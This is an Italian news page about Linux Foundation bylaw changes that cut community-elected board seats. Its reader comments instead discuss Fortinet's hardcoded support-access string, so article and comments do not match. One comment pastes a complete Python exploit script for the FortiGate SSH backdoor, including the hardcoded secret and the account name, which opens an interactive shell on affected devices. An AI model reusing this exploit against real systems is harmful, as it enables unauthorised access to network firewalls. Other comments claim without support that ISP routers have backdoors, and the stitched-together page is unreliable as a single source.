Tempesta in vista per Linux Foundation, l’organizzazione dedicata alla promozione e alla standardizzazione di Linux e del software open source che a dire dello sviluppatore Matthew Garrett si è chiusa a riccio lasciando fuori i rappresentati della community di volontari. Tutto come prima, risponde invece il CEO Jim Zemlin.
Garrett ha evidenziato un importante cambiamento apportato allo statuto interno della Fondazione per quanto riguarda l’elezione dei membri del consiglio che gestisce l’organizzazione, un organo che d’ora in poi dovrà di fatto accogliere solo le personalità indicate dalle aziende interessate a Linux per motivi di mero business.
Lo sviluppatore rivela che, fino a pochi giorni or sono, l’elezione del consiglio veniva ripartita tra 10 elementi indicati dai membri “platinum” della Linux Foundation (costo di iscrizione: 500.000 dollari all’anno), 3 dai membri “gold” (100.000 dollari), 1 dai membri “silver” (5.000-20.000 dollari) e 2 dai membri individuali (99 dollari) appartenenti alla community.
Il “grosso” delle decisioni della Fondazione è insomma vincolata alle esigenze delle corporazioni tecnologiche più importanti (Intel, NEC, IBM, HPE e Samsung sono tutti membri Platinum), ma ora anche la partecipazione simbolica della community è stata eliminata assieme alla possibilità di eleggere membri del consiglio da parte dei singoli partecipanti alla Fondazione.
Per Garrett la decisione di modificare lo statuto non è un cambiamento positivo, ma il CEO Jim Zemlin ha risposto ufficialmente alle preoccupazioni – e alle prevedibili polemiche emerse in questi giorni – parla di un’evoluzione in linea con le altre organizzazioni più importanti della “comunità e dell’industria” del FOSS. Le reazioni, neanche a dirlo, sono state tutto fuorché positive .
Alfonso Maruccia
-
Unico uono senza peccato?
"Fortinet definisce la stringa codificata come una funzionalità progettata per garantire acXXXXX facile e veloce agli apparati da parte del personale di supporto della società."Poter avere acXXXXX senza chiedere il consenso al cliente, visto che i tecnici e compagnia bella erano a conoscenza di questa porta spalancata, mi sa che potevano fare un pò come gli pare con i loro apparati.Re: Unico uono senza peccato?
- Scritto da: SalvatoreGX> "Fortinet definisce la stringa codificata come> una funzionalità progettata per garantire acXXXXX> facile e veloce agli apparati da parte del> personale di supporto della> società."> > Poter avere acXXXXX senza chiedere il consenso al> cliente, visto che i tecnici e compagnia bella> erano a conoscenza di questa porta spalancata, mi> sa che potevano fare un pò come gli pare con i> loro> apparati.Ed aggiungo.... Non proprio in questo modo, ma tutti gli apparati telecontrollati, tipo modem alice (telecom) , visto che hanno delle porte in ascolto per gli aggiornamenti firmware, potrebbero nascondere un qualcosa del genere.Re: Unico uono senza peccato?
- Scritto da: SalvatoreGX> - Scritto da: SalvatoreGX> > "Fortinet definisce la stringa codificata> > come una funzionalità progettata per> > garantire acXXXXX facile e veloce agli> > apparati da parte del personale di > > supporto della società."> > Poter avere acXXXXX senza chiedere il> > consenso al cliente, visto che i tecnici> > e compagnia bella erano a conoscenza di > > questa porta spalancata, mi sa che > > potevano fare un pò come gli pare con i> > loro apparati.> > Ed aggiungo.... Non proprio in questo modo, ma> tutti gli apparati telecontrollati, tipo modem> alice (telecom) , visto che hanno delle porte in> ascolto per gli aggiornamenti firmware,> potrebbero nascondere un qualcosa del> genere.Quelli Fastweb, in generale quando il provider vuole fornirvi il modem è quasi sempre provvisto di backdoor "per manutenzione".Re: Unico uono senza peccato?
- Scritto da: nome e cognome> - Scritto da: SalvatoreGX> > - Scritto da: SalvatoreGX> > > "Fortinet definisce la stringa> codificata> > > come una funzionalità progettata per> > > garantire acXXXXX facile e veloce agli> > > apparati da parte del personale di > > > supporto della società."> > > > Poter avere acXXXXX senza chiedere il> > > consenso al cliente, visto che i tecnici> > > e compagnia bella erano a conoscenza di > > > questa porta spalancata, mi sa che > > > potevano fare un pò come gli pare con i> > > loro apparati.> > > > Ed aggiungo.... Non proprio in questo modo,> ma> > tutti gli apparati telecontrollati, tipo> modem> > alice (telecom) , visto che hanno delle> porte> in> > ascolto per gli aggiornamenti firmware,> > potrebbero nascondere un qualcosa del> > genere.> > Quelli Fastweb, in generale quando il provider> vuole fornirvi il modem è quasi sempre provvisto> di backdoor "per> manutenzione".Che poi se non erro, sei quasi obbligato a prendere quello fastweb.Re: Unico uono senza peccato?
- Scritto da: SalvatoreGX> - Scritto da: SalvatoreGX> > "Fortinet definisce la stringa codificata come> > una funzionalità progettata per garantire> acXXXXX> > facile e veloce agli apparati da parte del> > personale di supporto della> > società."> > > > Poter avere acXXXXX senza chiedere il consenso> al> > cliente, visto che i tecnici e compagnia bella> > erano a conoscenza di questa porta spalancata,> mi> > sa che potevano fare un pò come gli pare con i> > loro> > apparati.> > > Ed aggiungo.... Non proprio in questo modo, ma> tutti gli apparati telecontrollati, tipo modem> alice (telecom) , visto che hanno delle porte in> ascolto per gli aggiornamenti firmware,>potrebbero nasconderenascondono un qualcosa del> genere.fixedRe: Unico uono senza peccato?
#!/usr/bin/env python # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7# Usage: ./fgt_ssh_backdoor.pyimport socketimport selectimport sysimport paramikofrom paramiko.py3compat import uimport base64import hashlibimport termiosimport tty def custom_handler(title, instructions, prompt_list): n = prompt_list[0][0] m = hashlib.sha1() m.update('x00' * 12) m.update(n + 'FGTAbc11*xy+Qqz27') m.update('xA3x88xBAx2Ex42x4CxB0x4Ax53x79x30xC1x31x07xCCx3FxA1x32x90x29xA9x81x5Bx70') h = 'AK1' + base64.b64encode('x00' * 12 + m.digest()) return [h] def main(): if len(sys.argv) < 2: print 'Usage: ' + sys.argv[0] + ' ' exit(-1) client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False) except paramiko.ssh_exception.SSHException: pass trans = client.get_transport() try: trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True) except paramiko.ssh_exception.AuthenticationException: pass trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler) chan = client.invoke_shell() oldtty = termios.tcgetattr(sys.stdin) try: tty.setraw(sys.stdin.fileno()) tty.setcbreak(sys.stdin.fileno()) chan.settimeout(0.0) while True: r, w, e = select.select([chan, sys.stdin], [], []) if chan in r: try: x = u(chan.recv(1024)) if len(x) == 0: sys.stdout.write('rn*** EOFrn') break sys.stdout.write(x) sys.stdout.flush() except socket.timeout: pass if sys.stdin in r: x = sys.stdin.read(1) if len(x) == 0: break chan.send(x) finally: termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty) if __name__ == '__main__': main() Re: Unico uono senza peccato?
Esattamente per la ragione che tu esponi ho cambiato e invito chiunque conosca a cambiare i router telecom. Quando l'ho scoperto stavo per insultarli. Un acXXXXX remoto noto a pig+dogs! Robe da matti!Re: Unico uono senza peccato?
- Scritto da: Luca> Esattamente per la ragione che tu esponi ho> cambiato e invito chiunque conosca a cambiare i> router telecom. Quando l'ho scoperto stavo per> insultarli. Un acXXXXX remoto noto a pig+dogs!> Robe da> matti!Vorrei poter capire meglio quanto detto da te.Potresti postare qualcosa di più concreto? Grazie in anticipo.Re: Unico uono senza peccato?
- Scritto da: Luca> Esattamente per la ragione che tu esponi ho> cambiato e invito chiunque conosca a cambiare i> router telecom. Quando l'ho scoperto stavo per> insultarli. Un acXXXXX remoto noto a pig+dogs!> Robe da> matti!E per quel Quando l'ho scoperto stavo perinsultarli, che chiedevo info, ammenochè non è tanto per dire come fanno in tanti. Saluti.backdoor benevola!
" la stringa codificata come una funzionalità progettata per garantire acXXXXX facile e veloce agli apparati da parte del personale di supporto della società "quindi una backdoor!" In ogni caso, spiega, non si tratta in alcun modo di una backdoor malevola "Ah però loro dicono che sono buoni.Allora tutto a posto: io mi fido. :DRe: backdoor benevola!
- Scritto da: omino della backdoor> " la stringa codificata come una funzionalità> progettata per garantire acXXXXX facile e veloce> agli apparati da parte del personale di supporto> della> società "> > quindi una backdoor!> > " In ogni caso, spiega, non si tratta in alcun> modo di una backdoor> malevola "> > Ah però loro dicono che sono buoni.> Allora tutto a posto: io mi fido. :Danche stalin quando ha fatto fuori 4 milioni di ucraini lo faceva per far star piu larghi quelli che fossero sopravvissuti: in pratica un benefattore dell'umanita'.Re: backdoor benevola!
- Scritto da: omino della backdoor> " la stringa codificata come una funzionalità> progettata per garantire acXXXXX facile e veloce> agli apparati da parte del personale di supporto> della> società "> > quindi una backdoor!> > " In ogni caso, spiega, non si tratta in alcun> modo di una backdoor> malevola "> > Ah però loro dicono che sono buoni.> Allora tutto a posto: io mi fido. :DAnch'io!Fortinet: ovvero, la faccia come il XXXX
da quando una backdoor non e' malevola?e' come dire che il cianuro, beh, si, se vogliamo essere fiscali, ti ammazza se lo mangi, ma lui, di suo, e' buono.ma andassero a XXXXXX loro e il t100 che, sono sicuro, cancellera' questo post.Nel mio router
Ho scaricato un virus che ha brasato il vecchio firmware...www.openwrt.org :D :pGrazie, il tuo commento è in fase di approvazioneGrazie, il tuo commento è stato pubblicatoCommento non inviatoLeggi gli altri commentiPubblicato il 26 gen 2016Link copiato negli appuntiTi potrebbe interessare
Pubblicato il 26 gen 2016Link copiato negli appunti
